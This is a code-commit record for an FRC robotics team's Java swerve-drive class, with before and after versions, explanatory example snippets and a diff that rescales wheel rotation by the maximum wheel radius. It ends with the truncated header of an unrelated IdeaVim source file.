* @param isLowGear true if need to shift to low * @param isHighGear true if need to shift to high */ public void swerveDriveRobot(double xVelocity, double yVelocity, double rotateVelocity, boolean isLowGear, boolean isHighGear) { WheelData deltaWheelData = null; if (xVelocity > SwerveMap.Control.DRIVE_STICK_DEAD_BAND || yVelocity > SwerveMap.Control.DRIVE_STICK_DEAD_BAND || rotateVelocity > SwerveMap.Control.DRIVE_STICK_DEAD_BAND) { // Compute new values WheelData rawWheelData = calculateRawWheelData(xVelocity, yVelocity, rotateVelocity); deltaWheelData = calculateDeltaWheelData(rawWheelData); } else { // Joystick in dead band, set neutral values deltaWheelData = new WheelData(); deltaWheelData.setDeadBandValues(); } // Set shifter if(isLowGear){ shift.set(DoubleSolenoid.Value.kForward); } if(isHighGear){ shift.set(DoubleSolenoid.Value.kReverse); } // Set pods setPods(deltaWheelData); } /** * Drive in swerve mode with a given speed, rotation, and shift values. * Driving parameters are assumed to be absolute based on a fixed angle, e.g. the field. * @param robotAngle Angle (in degrees) of robot relative to fixed angle. This is probably taken from the gyro. * @param xVelocity strafe (sideways) velocity. -1.0 = max motor speed left. 1.0 = max motor speed right. * @param yVelocity forward velocity. -1.0 = max motor speed backwards. 1.0 = max motor speed forward. * @param rotateVelocity clockwise rotational velocity. -1.0 = max motor speed counter-clockwise. 1.0 = max motor speed clockwise. * @param isLowGear true if need to shift to low * @param isHighGear true if need to shift to high */ public void swerveDriveAbsolute(double robotAngle, double xVelocity, double yVelocity, double rotateVelocity, boolean isLowGear, boolean isHighGear) { double robotAngleRad = Math.toRadians(robotAngle); double xRobot = -xVelocity * Math.sin(robotAngleRad) + yVelocity * Math.cos(robotAngleRad); double yRobot = xVelocity * Math.cos(robotAngleRad) + yVelocity * Math.sin(robotAngleRad); this.swerveDriveRobot(xRobot, yRobot, rotateVelocity, isLowGear, isHighGear); } /** * Control robot relative to itself */ public void swerveDriveTeleop() { double xVelocity, yVelocity, rotateVelocity; boolean isLowGear, isHighGear; xVelocity = SwerveMap.Control.DRIVE_STICK.getRawAxis(SwerveMap.Control.DRIVE_AXIS_FORWARD_BACK); yVelocity = -SwerveMap.Control.DRIVE_STICK.getRawAxis(SwerveMap.Control.DRIVE_AXIS_SIDEWAYS); rotateVelocity = SwerveMap.Control.DRIVE_STICK.getRawAxis(SwerveMap.Control.DRIVE_AXIS_ROTATE); isLowGear = SwerveMap.Control.DRIVE_STICK.getRawButton(SwerveMap.Control.DRIVE_CONTROLLER_SHIFT_LOW); isHighGear = SwerveMap.Control.DRIVE_STICK.getRawButton(SwerveMap.Control.DRIVE_CONTROLLER_SHIFT_HIGH); swerveDriveRobot(xVelocity, yVelocity, rotateVelocity, isLowGear, isHighGear); } /** * Control robot relative to a fixed angle using gyro */ public void swerveDriveTeleopGyro() { double xVelocity, yVelocity, rotateVelocity; boolean isLowGear, isHighGear; xVelocity = SwerveMap.Control.DRIVE_STICK.getRawAxis(SwerveMap.Control.DRIVE_AXIS_FORWARD_BACK); yVelocity = -SwerveMap.Control.DRIVE_STICK.getRawAxis(SwerveMap.Control.DRIVE_AXIS_SIDEWAYS); rotateVelocity = SwerveMap.Control.DRIVE_STICK.getRawAxis(SwerveMap.Control.DRIVE_AXIS_ROTATE); isLowGear = SwerveMap.Control.DRIVE_STICK.getRawButton(SwerveMap.Control.DRIVE_CONTROLLER_SHIFT_LOW); isHighGear = SwerveMap.Control.DRIVE_STICK.getRawButton(SwerveMap.Control.DRIVE_CONTROLLER_SHIFT_HIGH); double robotAngle = SwerveMap.Control.GYRO.getAngle(); 
swerveDriveAbsolute(robotAngle, xVelocity, yVelocity, rotateVelocity, isLowGear, isHighGear); } /** * Class to store angle and flip together * @author emiller * */ public class AngleFlip { private double angle; private boolean flip; public AngleFlip() { setAngle(0); setFlip(false); } public AngleFlip(double angle) { this.setAngle(angle); setFlip(false); } public AngleFlip(double angle, boolean flip) { this.setAngle(angle); flip = false; } /** * @return the angle */ public double getAngle() { return angle; } /** * @param angle the angle to set */ public void setAngle(double angle) { this.angle = angle; } /** * @return the flip */ public boolean isFlip() { return flip; } /** * @param flip the flip to set */ public void setFlip(boolean flip) { this.flip = flip; } }; /** * Normalizes an angle in degrees to (-180, 180]. * @param theta Angle to normalize * @return Normalized angle */ public double normalizeAngle(double theta) { while (theta > 180) { theta -= 360; } while (theta < -180) { theta += 360; } return theta; } /** * Compute angle needed to turn and whether or not flip is needed * @param currentAngle * @param targetAngle * @return new angle with flip */ public AngleFlip computeTurnAngle(double currentAngle, double targetAngle) { AngleFlip turnAngle = new AngleFlip(targetAngle - currentAngle, false); if (Math.abs(turnAngle.getAngle()) > 90) { turnAngle.setAngle(normalizeAngle(turnAngle.getAngle() + 180)); turnAngle.setFlip(true); } return turnAngle; } /** * Compute change angle to get from current to target angle. * @param currentAngle Current angle * @param targetAngle New angle to change to * @return change angle */ public double computeChangeAngle(double currentAngle, double targetAngle) { return computeTurnAngle(currentAngle, targetAngle).getAngle(); } /** * Scale drive speed based on how far wheel needs to turn * @param turnAngle Angle wheel needs to turn (with flip value) * @return speed scale factor in range [0, 1] */ public double driveScale(AngleFlip turnAngle) { double scale = 0; if (Math.abs(turnAngle.getAngle()) < 45) { /* * Eric comment: I don't like the discontinuous nature of this scaling. * Possible improvements: * 1) Use cosine(2 * turnAngle) * 2) Scale any angle < 90. */ scale = Math.cos(Math.toRadians(turnAngle.getAngle())); } else { scale = 0; } if (turnAngle.isFlip()) { scale = -scale; } return scale; } private class Pod implements PIDOutput, PIDSource { private Encoder steeringEnc; private SpeedController drive; private SpeedController steer; private PIDController pid; public Pod(SpeedController driveController, SpeedController steeringController, int steeringEncA, int steeringEncB, int podNumber) { steeringEnc = new Encoder(steeringEncA, steeringEncB); steeringEnc.setDistancePerPulse(SwerveMap.Constants.STEERING_ENC_PULSES_PER_REVOLUTION); drive = driveController; steer = steeringController; pid = new PIDController(SwerveMap.Constants.STEERING_PID_P, SwerveMap.Constants.STEERING_PID_I, SwerveMap.Constants.STEERING_PID_D, this, this); SmartDashboard.putData("Steering Pod " + podNumber, pid); pid.setInputRange(-180, 180); pid.setContinuous(true); pid.enable(); } public void pidWrite(double output) { steer.set(output); } public double pidGet() { return steeringEnc.getDistance(); } public void setSteeringAngle(double angle) { pid.setSetpoint(angle); } public void setWheelSpeed(double speed) { drive.set(speed); } } public void initDefaultCommand() { } }
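The generalized routine above treats each wheel's velocity as the robot's translation plus a rotation term perpendicular to the wheel's offset from the pivot, scaled by the farthest wheel's radius; wheel speed and steering angle then come from that resulting vector. Here is a stripped-down sketch of the per-wheel calculation for the front-right wheel, using made-up dimensions in place of the SwerveMap constants.

// Illustrative per-wheel swerve calculation (dimensions are made up).
public class SwerveWheelMathExample {
    public static void main(String[] args) {
        double xVel = 0.5;    // strafe command, -1..1
        double yVel = 0.5;    // forward command, -1..1
        double rotVel = 0.25; // clockwise rotation command, -1..1

        // Front-right wheel position relative to the pivot, in the same
        // convention as the code above: x to the right, y forward.
        double xDist = 12.0, yDist = 14.0;
        double rMax = Math.hypot(12.0, 14.0); // farthest wheel from the pivot

        // Translation plus rotation contribution, normalized by rMax so the
        // outermost wheel never exceeds the commanded rotation speed.
        double xWheel = xVel + rotVel * yDist / rMax;
        double yWheel = yVel - rotVel * xDist / rMax;

        double speed = Math.hypot(xWheel, yWheel);
        double angleDeg = Math.toDegrees(Math.atan2(xWheel, yWheel));
        System.out.printf("front-right: speed=%.3f angle=%.1f deg%n", speed, angleDeg);
    }
}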
2015RecycleRush/src/org/usfirst/frc/team2339/Barracuda/SwerveDrive.java
package org.usfirst.frc.team2339.Barracuda; /* * Add a swerve mode to RobotDrive * Code from Chief Delphi: http://www.chiefdelphi.com/forums/showthread.php?t=117099 */ import org.usfirst.frc.team2339.Barracuda.RobotMap.SwerveMap; //import com.sun.squawk.util.MathUtils; import java.lang.Math; import edu.wpi.first.wpilibj.DoubleSolenoid; import edu.wpi.first.wpilibj.Encoder; import edu.wpi.first.wpilibj.PIDController; import edu.wpi.first.wpilibj.PIDOutput; import edu.wpi.first.wpilibj.PIDSource; import edu.wpi.first.wpilibj.RobotDrive; import edu.wpi.first.wpilibj.SpeedController; import edu.wpi.first.wpilibj.Talon; import edu.wpi.first.wpilibj.smartdashboard.SmartDashboard; /** * * */ public class SwerveDrive extends RobotDrive { //declare the steering pods and shifter valve public static final int frontLeft = MotorType.kFrontLeft.value; public static final int frontRight = MotorType.kFrontRight.value; public static final int rearLeft = MotorType.kRearLeft.value; public static final int rearRight = MotorType.kRearRight.value; protected SpeedController speedControllers[] = new SpeedController[kMaxNumberOfMotors]; protected Pod wheelPods[] = new Pod[kMaxNumberOfMotors]; private DoubleSolenoid shift; public class WheelData { public double wheelSpeeds[] = new double[kMaxNumberOfMotors]; public double wheelAngles[] = new double[kMaxNumberOfMotors]; public WheelData() { // Initialize data for (int iiWheel = 0; iiWheel < kMaxNumberOfMotors; iiWheel++) { wheelSpeeds[iiWheel] = 0; wheelAngles[iiWheel] = 0; } } /** * Set speed and angle values when joystick in dead band */ public void setDeadBandValues() { for (int iiWheel = 0; iiWheel < kMaxNumberOfMotors; iiWheel++) { wheelSpeeds[iiWheel] = 0; wheelAngles[iiWheel] = 45; } wheelAngles[frontRight] = -45; wheelAngles[rearLeft] = -45; } } public SwerveDrive() { super(SwerveMap.PWM.DRIVE_FRONT_LEFT, SwerveMap.PWM.DRIVE_REAR_LEFT, SwerveMap.PWM.DRIVE_FRONT_RIGHT, SwerveMap.PWM.DRIVE_REAR_RIGHT); speedControllers[frontLeft] = new Talon(SwerveMap.PWM.DRIVE_FRONT_LEFT_STEERING); speedControllers[frontRight] = new Talon(SwerveMap.PWM.DRIVE_FRONT_RIGHT_STEERING); speedControllers[rearLeft] = new Talon(SwerveMap.PWM.DRIVE_REAR_LEFT_STEERING); speedControllers[rearRight] = new Talon(SwerveMap.PWM.DRIVE_REAR_RIGHT_STEERING); //set up the steering pods with the correct sensors and controllers shift = new DoubleSolenoid(SwerveMap.Solenoid.DRIVE_SHIFT_HIGH, SwerveMap.Solenoid.DRIVE_SHIFT_LOW); wheelPods[frontLeft] = new Pod(m_frontLeftMotor, speedControllers[frontLeft], SwerveMap.DIO.DRIVE_FRONT_LEFT_ENC_A, SwerveMap.DIO.DRIVE_FRONT_LEFT_ENC_B, 1); wheelPods[frontRight] = new Pod(m_frontRightMotor, speedControllers[frontRight], SwerveMap.DIO.DRIVE_FRONT_RIGHT_ENC_A, SwerveMap.DIO.DRIVE_FRONT_RIGHT_ENC_B, 2); wheelPods[rearLeft] = new Pod(m_rearLeftMotor, speedControllers[rearLeft], SwerveMap.DIO.DRIVE_REAR_LEFT_ENC_A, SwerveMap.DIO.DRIVE_REAR_LEFT_ENC_B, 3); wheelPods[rearRight] = new Pod(m_rearRightMotor, speedControllers[rearRight], SwerveMap.DIO.DRIVE_REAR_RIGHT_ENC_A, SwerveMap.DIO.DRIVE_REAR_RIGHT_ENC_B, 4); } /** * Calculate raw wheel speeds and angles for swerve drive based on input robot forward, strafe, and rotational velocities. * Wheel speeds are normalized to the range [0, 1.0]. Angles are normalized to the range [-180, 180). * Calculated values are raw in that they have no consideration for current state of drive. * Most swerve code assumes the pivot point for rotation is the center of the wheels (i.e. 
center of rectangle with wheels as corners) * This calculation is generalized based on pivot being offset from rectangle center. * @param xVelocity strafe (sideways) velocity. -1.0 = max motor speed left. 1.0 = max motor speed right. * @param yVelocity forward velocity. -1.0 = max motor speed backwards. 1.0 = max motor speed forward. * @param rotateVelocity clockwise rotational velocity. -1.0 = max motor speed counter-clockwise. 1.0 = max motor speed clockwise. * @param xPivotOffset Amount pivot is offset sideways from center. (Positive toward right, negative toward left) * @param yPivotOffset Amount pivot is offset forward from center. (Positive toward front, negative toward back) * @return raw wheel speeds and angles */ public WheelData calculateRawWheelDataGeneral(double xVelocity, double yVelocity, double rotateVelocity, double xPivotOffset, double yPivotOffset) { WheelData rawWheelData = new WheelData(); double L = SwerveMap.Constants.WHEEL_BASE_LENGTH; double W = SwerveMap.Constants.WHEEL_BASE_WIDTH; double frontDist = L/2 - xPivotOffset; double rearDist = L/2 + xPivotOffset; double rightDist = W/2 - yPivotOffset; double leftDist = W/2 + yPivotOffset; double xDist = 0; double yDist = 0; double rWheel = 0; double xWheel = 0; double yWheel = 0; xDist = rightDist; yDist = frontDist; rWheel = Math.hypot(xDist, yDist); xWheel = xVelocity + rotateVelocity * yDist / rWheel; yWheel = yVelocity - rotateVelocity * xDist / rWheel; rawWheelData.wheelSpeeds[frontRight] = Math.hypot(xWheel, yWheel); rawWheelData.wheelAngles[frontRight] = Math.toDegrees(Math.atan2(xWheel, yWheel)); xDist = leftDist; yDist = frontDist; rWheel = Math.hypot(xDist, yDist); xWheel = xVelocity + rotateVelocity * yDist / rWheel; yWheel = yVelocity + rotateVelocity * xDist / rWheel; rawWheelData.wheelSpeeds[frontLeft] = Math.hypot(xWheel, yWheel); rawWheelData.wheelAngles[frontLeft] = Math.toDegrees(Math.atan2(xWheel, yWheel)); xDist = leftDist; yDist = rearDist; rWheel = Math.hypot(xDist, yDist); xWheel = xVelocity - rotateVelocity * yDist / rWheel; yWheel = yVelocity + rotateVelocity * xDist / rWheel; rawWheelData.wheelSpeeds[rearLeft] = Math.hypot(xWheel, yWheel); rawWheelData.wheelAngles[rearLeft] = Math.toDegrees(Math.atan2(xWheel, yWheel)); xDist = rightDist; yDist = rearDist; rWheel = Math.hypot(xDist, yDist); xWheel = xVelocity - rotateVelocity * yDist / rWheel; yWheel = yVelocity - rotateVelocity * xDist / rWheel; rawWheelData.wheelSpeeds[rearRight] = Math.hypot(xWheel, yWheel); rawWheelData.wheelAngles[rearRight] = Math.toDegrees(Math.atan2(xWheel, yWheel)); normalize(rawWheelData.wheelSpeeds); return rawWheelData; } /** * NOTE: This should give same result as standard method below. * Calculate raw wheel speeds and angles for swerve drive based on input robot forward, strafe, and rotational velocities. * Wheel speeds are normalized to the range [0, 1.0]. Angles are normalized to the range [-180, 180). * Calculated values are raw in that they have no consideration for current state of drive. * @param xVelocity strafe (sideways) velocity. -1.0 = max motor speed left. 1.0 = max motor speed right. * @param yVelocity forward velocity. -1.0 = max motor speed backwards. 1.0 = max motor speed forward. * @param rotateVelocity clockwise rotational velocity. -1.0 = max motor speed counter-clockwise. 1.0 = max motor speed clockwise. 
* @return raw wheel speeds and angles */ public WheelData calculateRawWheelData1(double xVelocity, double yVelocity, double rotateVelocity) { return calculateRawWheelDataGeneral(xVelocity, yVelocity, rotateVelocity, 0.0, 0.0); } /** * Calculate raw wheel speeds and angles for swerve drive based on input robot forward, strafe, and rotational velocities. * Wheel speeds are normalized to the range [0, 1.0]. Angles are normalized to the range [-180, 180). * Calculated values are raw in that they have no consideration for current state of drive. * @param xVelocity strafe (sideways) velocity. -1.0 = max motor speed left. 1.0 = max motor speed right. * @param yVelocity forward velocity. -1.0 = max motor speed backwards. 1.0 = max motor speed forward. * @param rotateVelocity clockwise rotational velocity. -1.0 = max motor speed counter-clockwise. 1.0 = max motor speed clockwise. * @return raw wheel speeds and angles */ public WheelData calculateRawWheelData(double xVelocity, double yVelocity, double rotateVelocity) { WheelData rawWheelData = new WheelData(); //calculate angle/speed setpoints using wheel dimensions from SwerveMap double L = SwerveMap.Constants.WHEEL_BASE_LENGTH; double W = SwerveMap.Constants.WHEEL_BASE_WIDTH;; double R = Math.hypot(L, W); double A = xVelocity - rotateVelocity * (L / R); double B = xVelocity + rotateVelocity * (L / R); double C = yVelocity - rotateVelocity * (W / R); double D = yVelocity + rotateVelocity * (W / R); // Find wheel speeds rawWheelData.wheelSpeeds[frontLeft] = Math.hypot(B, D); rawWheelData.wheelSpeeds[frontRight] = Math.hypot(B, C); rawWheelData.wheelSpeeds[rearLeft] = Math.hypot(A, D); rawWheelData.wheelSpeeds[rearRight] = Math.hypot(A, C); normalize(rawWheelData.wheelSpeeds); // Find steering angles rawWheelData.wheelAngles[frontLeft] = Math.toDegrees(Math.atan2(B, D)); rawWheelData.wheelAngles[frontRight] = Math.toDegrees(Math.atan2(B, C)); rawWheelData.wheelAngles[rearLeft] = Math.toDegrees(Math.atan2(A, D)); rawWheelData.wheelAngles[rearRight] = Math.toDegrees(Math.atan2(A, C)); return rawWheelData; } /** * Calculate wheel data change (delta) based on current data. * @param rawWheelData Raw wheel change data * @return wheel change data (delta) based on current wheel values */ public WheelData calculateDeltaWheelData(WheelData rawWheelData) { WheelData deltaWheelData = new WheelData(); for (int iiWheel = 0; iiWheel < kMaxNumberOfMotors; iiWheel++) { // Compute turn angle from encoder value (pidGet) and raw target value AngleFlip turnAngle = computeTurnAngle(wheelPods[iiWheel].pidGet(), rawWheelData.wheelAngles[iiWheel]); deltaWheelData.wheelAngles[iiWheel] = turnAngle.getAngle(); deltaWheelData.wheelSpeeds[iiWheel] = driveScale(turnAngle) * rawWheelData.wheelSpeeds[iiWheel]; } return deltaWheelData; } public void setPods(WheelData wheelData) { for (int iiWheel = 0; iiWheel < kMaxNumberOfMotors; iiWheel++) { wheelPods[iiWheel].setSteeringAngle(wheelData.wheelAngles[iiWheel]); wheelPods[iiWheel].setWheelSpeed(wheelData.wheelSpeeds[iiWheel]); } } /** * Drive in swerve mode with a given speed, rotation, and shift values. * Driving parameters are assumed to be relative to the current robot angle. * @param xVelocity strafe (sideways) velocity. -1.0 = max motor speed left. 1.0 = max motor speed right. * @param yVelocity forward velocity. -1.0 = max motor speed backwards. 1.0 = max motor speed forward. * @param rotateVelocity clockwise rotational velocity. -1.0 = max motor speed counter-clockwise. 1.0 = max motor speed clockwise. 
* @param isLowGear true if need to shift to low * @param isHighGear true if need to shift to high */ public void swerveDriveRobot(double xVelocity, double yVelocity, double rotateVelocity, boolean isLowGear, boolean isHighGear) { WheelData deltaWheelData = null; if (xVelocity > SwerveMap.Control.DRIVE_STICK_DEAD_BAND || yVelocity > SwerveMap.Control.DRIVE_STICK_DEAD_BAND || rotateVelocity > SwerveMap.Control.DRIVE_STICK_DEAD_BAND) { // Compute new values WheelData rawWheelData = calculateRawWheelData(xVelocity, yVelocity, rotateVelocity); deltaWheelData = calculateDeltaWheelData(rawWheelData); } else { // Joystick in dead band, set neutral values deltaWheelData = new WheelData(); deltaWheelData.setDeadBandValues(); } // Set shifter if(isLowGear){ shift.set(DoubleSolenoid.Value.kForward); } if(isHighGear){ shift.set(DoubleSolenoid.Value.kReverse); } // Set pods setPods(deltaWheelData); } /** * Drive in swerve mode with a given speed, rotation, and shift values. * Driving parameters are assumed to be absolute based on a fixed angle, e.g. the field. * @param robotAngle Angle (in degrees) of robot relative to fixed angle. This is probably taken from the gyro. * @param xVelocity strafe (sideways) velocity. -1.0 = max motor speed left. 1.0 = max motor speed right. * @param yVelocity forward velocity. -1.0 = max motor speed backwards. 1.0 = max motor speed forward. * @param rotateVelocity clockwise rotational velocity. -1.0 = max motor speed counter-clockwise. 1.0 = max motor speed clockwise. * @param isLowGear true if need to shift to low * @param isHighGear true if need to shift to high */ public void swerveDriveAbsolute(double robotAngle, double xVelocity, double yVelocity, double rotateVelocity, boolean isLowGear, boolean isHighGear) { double robotAngleRad = Math.toRadians(robotAngle); double xRobot = -xVelocity * Math.sin(robotAngleRad) + yVelocity * Math.cos(robotAngleRad); double yRobot = xVelocity * Math.cos(robotAngleRad) + yVelocity * Math.sin(robotAngleRad); this.swerveDriveRobot(xRobot, yRobot, rotateVelocity, isLowGear, isHighGear); } /** * Control robot relative to itself */ public void swerveDriveTeleop() { double xVelocity, yVelocity, rotateVelocity; boolean isLowGear, isHighGear; xVelocity = SwerveMap.Control.DRIVE_STICK.getRawAxis(SwerveMap.Control.DRIVE_AXIS_FORWARD_BACK); yVelocity = -SwerveMap.Control.DRIVE_STICK.getRawAxis(SwerveMap.Control.DRIVE_AXIS_SIDEWAYS); rotateVelocity = SwerveMap.Control.DRIVE_STICK.getRawAxis(SwerveMap.Control.DRIVE_AXIS_ROTATE); isLowGear = SwerveMap.Control.DRIVE_STICK.getRawButton(SwerveMap.Control.DRIVE_CONTROLLER_SHIFT_LOW); isHighGear = SwerveMap.Control.DRIVE_STICK.getRawButton(SwerveMap.Control.DRIVE_CONTROLLER_SHIFT_HIGH); swerveDriveRobot(xVelocity, yVelocity, rotateVelocity, isLowGear, isHighGear); } /** * Control robot relative to a fixed angle using gyro */ public void swerveDriveTeleopGyro() { double xVelocity, yVelocity, rotateVelocity; boolean isLowGear, isHighGear; xVelocity = SwerveMap.Control.DRIVE_STICK.getRawAxis(SwerveMap.Control.DRIVE_AXIS_FORWARD_BACK); yVelocity = -SwerveMap.Control.DRIVE_STICK.getRawAxis(SwerveMap.Control.DRIVE_AXIS_SIDEWAYS); rotateVelocity = SwerveMap.Control.DRIVE_STICK.getRawAxis(SwerveMap.Control.DRIVE_AXIS_ROTATE); isLowGear = SwerveMap.Control.DRIVE_STICK.getRawButton(SwerveMap.Control.DRIVE_CONTROLLER_SHIFT_LOW); isHighGear = SwerveMap.Control.DRIVE_STICK.getRawButton(SwerveMap.Control.DRIVE_CONTROLLER_SHIFT_HIGH); double robotAngle = SwerveMap.Control.GYRO.getAngle(); 
swerveDriveAbsolute(robotAngle, xVelocity, yVelocity, rotateVelocity, isLowGear, isHighGear); } /** * Class to store angle and flip together * @author emiller * */ public class AngleFlip { private double angle; private boolean flip; public AngleFlip() { setAngle(0); setFlip(false); } public AngleFlip(double angle) { this.setAngle(angle); setFlip(false); } public AngleFlip(double angle, boolean flip) { this.setAngle(angle); flip = false; } /** * @return the angle */ public double getAngle() { return angle; } /** * @param angle the angle to set */ public void setAngle(double angle) { this.angle = angle; } /** * @return the flip */ public boolean isFlip() { return flip; } /** * @param flip the flip to set */ public void setFlip(boolean flip) { this.flip = flip; } }; /** * Normalizes an angle in degrees to (-180, 180]. * @param theta Angle to normalize * @return Normalized angle */ public double normalizeAngle(double theta) { while (theta > 180) { theta -= 360; } while (theta < -180) { theta += 360; } return theta; } /** * Compute angle needed to turn and whether or not flip is needed * @param currentAngle * @param targetAngle * @return new angle with flip */ public AngleFlip computeTurnAngle(double currentAngle, double targetAngle) { AngleFlip turnAngle = new AngleFlip(targetAngle - currentAngle, false); if (Math.abs(turnAngle.getAngle()) > 90) { turnAngle.setAngle(normalizeAngle(turnAngle.getAngle() + 180)); turnAngle.setFlip(true); } return turnAngle; } /** * Compute change angle to get from current to target angle. * @param currentAngle Current angle * @param targetAngle New angle to change to * @return change angle */ public double computeChangeAngle(double currentAngle, double targetAngle) { return computeTurnAngle(currentAngle, targetAngle).getAngle(); } /** * Scale drive speed based on how far wheel needs to turn * @param turnAngle Angle wheel needs to turn (with flip value) * @return speed scale factor in range [0, 1] */ public double driveScale(AngleFlip turnAngle) { double scale = 0; if (Math.abs(turnAngle.getAngle()) < 45) { /* * Eric comment: I don't like the discontinuous nature of this scaling. * Possible improvements: * 1) Use cosine(2 * turnAngle) * 2) Scale any angle < 90. */ scale = Math.cos(Math.toRadians(turnAngle.getAngle())); } else { scale = 0; } if (turnAngle.isFlip()) { scale = -scale; } return scale; } private class Pod implements PIDOutput, PIDSource { private Encoder steeringEnc; private SpeedController drive; private SpeedController steer; private PIDController pid; public Pod(SpeedController driveController, SpeedController steeringController, int steeringEncA, int steeringEncB, int podNumber) { steeringEnc = new Encoder(steeringEncA, steeringEncB); steeringEnc.setDistancePerPulse(SwerveMap.Constants.STEERING_ENC_PULSES_PER_REVOLUTION); drive = driveController; steer = steeringController; pid = new PIDController(SwerveMap.Constants.STEERING_PID_P, SwerveMap.Constants.STEERING_PID_I, SwerveMap.Constants.STEERING_PID_D, this, this); SmartDashboard.putData("Steering Pod " + podNumber, pid); pid.setInputRange(-180, 180); pid.setContinuous(true); pid.enable(); } public void pidWrite(double output) { steer.set(output); } public double pidGet() { return steeringEnc.getDistance(); } public void setSteeringAngle(double angle) { pid.setSetpoint(angle); } public void setWheelSpeed(double speed) { drive.set(speed); } } public void initDefaultCommand() { } }
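Both versions of the file share the steering optimization in computeTurnAngle and driveScale: if reaching the target heading would require turning the pod more than 90 degrees, the pod turns to the opposite heading and the wheel is driven in reverse, with drive speed scaled down while the pod is far from its setpoint. A compact standalone sketch of that flip decision (angles in degrees, names are illustrative):

// Standalone sketch of the >90-degree flip optimization used by computeTurnAngle.
public class TurnFlipExample {
    public static void main(String[] args) {
        System.out.println(java.util.Arrays.toString(turn(0, 170))); // flips: [-10.0, -1.0]
        System.out.println(java.util.Arrays.toString(turn(0, 45)));  // no flip: [45.0, 1.0]
    }

    // Returns {angleToTurn, driveSign}; driveSign is -1 when the wheel should run reversed.
    static double[] turn(double current, double target) {
        double delta = normalize(target - current);
        double sign = 1;
        if (Math.abs(delta) > 90) {   // shorter to point the pod the other way
            delta = normalize(delta + 180);
            sign = -1;                // ...and drive the wheel backwards
        }
        return new double[]{delta, sign};
    }

    static double normalize(double theta) {
        while (theta > 180) theta -= 360;
        while (theta < -180) theta += 360;
        return theta;
    }
}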
Normalize rotational velocity based on maximum wheel distance from center.
2015RecycleRush/src/org/usfirst/frc/team2339/Barracuda/SwerveDrive.java
Normalize rotational velocity based on maximum wheel distance from center.
<ide><path>015RecycleRush/src/org/usfirst/frc/team2339/Barracuda/SwerveDrive.java <ide> double rearDist = L/2 + xPivotOffset; <ide> double rightDist = W/2 - yPivotOffset; <ide> double leftDist = W/2 + yPivotOffset; <add> <add> // Find maximum wheel distance (radius) from center <add> // Maximum radius is used to normalize rotational velocity so that wheels farthest from center move the fastest. <add> double xMax = Math.max(rightDist, leftDist); <add> double yMax = Math.max(frontDist, rearDist); <add> double rMax = Math.hypot(xMax, yMax); <ide> <ide> double xDist = 0; <ide> double yDist = 0; <del> double rWheel = 0; <ide> double xWheel = 0; <ide> double yWheel = 0; <ide> <ide> xDist = rightDist; <ide> yDist = frontDist; <del> rWheel = Math.hypot(xDist, yDist); <del> xWheel = xVelocity + rotateVelocity * yDist / rWheel; <del> yWheel = yVelocity - rotateVelocity * xDist / rWheel; <add> xWheel = xVelocity + rotateVelocity * yDist / rMax; <add> yWheel = yVelocity - rotateVelocity * xDist / rMax; <ide> rawWheelData.wheelSpeeds[frontRight] = Math.hypot(xWheel, yWheel); <ide> rawWheelData.wheelAngles[frontRight] = Math.toDegrees(Math.atan2(xWheel, yWheel)); <ide> <ide> xDist = leftDist; <ide> yDist = frontDist; <del> rWheel = Math.hypot(xDist, yDist); <del> xWheel = xVelocity + rotateVelocity * yDist / rWheel; <del> yWheel = yVelocity + rotateVelocity * xDist / rWheel; <add> xWheel = xVelocity + rotateVelocity * yDist / rMax; <add> yWheel = yVelocity + rotateVelocity * xDist / rMax; <ide> rawWheelData.wheelSpeeds[frontLeft] = Math.hypot(xWheel, yWheel); <ide> rawWheelData.wheelAngles[frontLeft] = Math.toDegrees(Math.atan2(xWheel, yWheel)); <ide> <ide> xDist = leftDist; <ide> yDist = rearDist; <del> rWheel = Math.hypot(xDist, yDist); <del> xWheel = xVelocity - rotateVelocity * yDist / rWheel; <del> yWheel = yVelocity + rotateVelocity * xDist / rWheel; <add> xWheel = xVelocity - rotateVelocity * yDist / rMax; <add> yWheel = yVelocity + rotateVelocity * xDist / rMax; <ide> rawWheelData.wheelSpeeds[rearLeft] = Math.hypot(xWheel, yWheel); <ide> rawWheelData.wheelAngles[rearLeft] = Math.toDegrees(Math.atan2(xWheel, yWheel)); <ide> <ide> xDist = rightDist; <ide> yDist = rearDist; <del> rWheel = Math.hypot(xDist, yDist); <del> xWheel = xVelocity - rotateVelocity * yDist / rWheel; <del> yWheel = yVelocity - rotateVelocity * xDist / rWheel; <add> xWheel = xVelocity - rotateVelocity * yDist / rMax; <add> yWheel = yVelocity - rotateVelocity * xDist / rMax; <ide> rawWheelData.wheelSpeeds[rearRight] = Math.hypot(xWheel, yWheel); <ide> rawWheelData.wheelAngles[rearRight] = Math.toDegrees(Math.atan2(xWheel, yWheel)); <ide>
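The diff above swaps the per-wheel radius rWheel for the maximum radius rMax when scaling the rotation term. With per-wheel normalization every wheel received the full rotational magnitude regardless of its distance from the pivot; normalizing by rMax makes the outermost wheel fastest and inner wheels proportionally slower, which matches rigid-body rotation. A small standalone check of the two scalings, using illustrative dimensions rather than the robot's actual wheel base:

// Quick check: the old code gave every wheel the same rotational magnitude,
// while the new code scales an inner wheel down by rWheel / rMax.
public class RotationScalingExample {
    public static void main(String[] args) {
        double rotVel = 1.0;
        double inner = Math.hypot(6.0, 7.0);    // a wheel close to the pivot
        double outer = Math.hypot(12.0, 14.0);  // the farthest wheel (rMax)
        double oldInner = rotVel * inner / inner; // old: normalized per wheel, always 1.0
        double newInner = rotVel * inner / outer; // new: normalized by rMax, about 0.5 here
        System.out.println("old inner magnitude: " + oldInner);
        System.out.println("new inner magnitude: " + newInner);
    }
}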
Java
mit
69ebcc17e956b73d90a4992f12c8c61ccefb25bb
0
JetBrains/ideavim,JetBrains/ideavim
/* * IdeaVim - Vim emulator for IDEs based on the IntelliJ platform * Copyright (C) 2003-2016 The IdeaVim authors * * This program is free software: you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation, either version 2 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program. If not, see <http://www.gnu.org/licenses/>. */ package com.maddyhome.idea.vim.group; import com.intellij.openapi.actionSystem.DataContext; import com.intellij.openapi.editor.Caret; import com.intellij.openapi.editor.CaretModel; import com.intellij.openapi.editor.Editor; import com.intellij.openapi.editor.LogicalPosition; import com.intellij.openapi.util.Pair; import com.intellij.openapi.util.text.StringUtil; import com.maddyhome.idea.vim.VimPlugin; import 